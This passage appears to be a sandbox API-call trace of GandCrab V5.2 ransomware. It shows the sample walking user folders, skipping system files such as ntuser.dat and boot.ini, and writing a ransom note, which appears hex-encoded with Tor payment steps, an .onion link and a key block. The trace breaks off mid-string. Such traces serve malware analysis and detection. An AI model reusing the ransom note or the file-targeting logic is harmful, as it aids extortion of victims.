VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.151] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".exe ") returned 5 [0092.151] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.151] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.152] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.152] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0092.152] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0092.152] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\TITWMVJL-DECRYPT.txt" [0092.152] lstrlenW (lpString=".titwmvjl") returned 9 [0092.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\TITWMVJL-DECRYPT.txt") returned 52 [0092.152] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.152] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 61 [0092.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\TITWMVJL-DECRYPT.txt") returned 52 [0092.152] lstrlenW (lpString=".txt") returned 4 [0092.152] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.152] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0092.152] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0092.153] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.153] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\TITWMVJL-DECRYPT.txt") returned 52 [0092.153] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\TITWMVJL-DECRYPT.txt") returned 52 [0092.153] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0092.153] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0092.153] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0092.153] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0092.153] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0092.153] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0092.153] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0092.153] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0092.153] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.153] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0092.154] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0092.154] CloseHandle (hObject=0x230) returned 1 [0092.154] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0092.154] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0092.154] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0092.154] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Favorites" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites" [0092.154] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\" [0092.155] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0092.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.155] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.155] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.156] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.156] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.156] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.156] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.156] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\\\TITWMVJL-DECRYPT.txt") returned 53 [0092.156] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0092.157] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\